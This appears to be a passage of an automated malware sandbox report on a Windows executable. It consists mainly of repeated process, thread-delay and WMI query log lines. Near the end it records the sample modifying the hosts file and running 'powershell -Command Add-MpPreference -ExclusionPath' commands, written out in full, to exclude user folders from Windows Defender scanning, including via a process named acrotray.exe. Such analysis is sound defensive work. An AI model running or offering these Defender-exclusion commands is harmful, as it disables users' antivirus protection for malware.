Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720	Thread sleep count: 6104 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720	Thread sleep count: 2838 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 1369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 6848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep count: 5602 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep count: 2735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep count: 5180 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep count: 3331 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920	Thread sleep count: 5450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep count: 3003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060	Thread sleep count: 4727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060	Thread sleep count: 3458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 720	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6104	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2838	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5602
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3458

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File opened: PHYSICALDRIVE0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564099859.0000000000CE8000.00000004.00000020.sdmp, acrotray.exe, 00000029.00000002.562719738.0000000000BB8000.00000004.00000020.sdmp, acrotray.exe, 00000045.00000002.560875709.00000000000BF000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
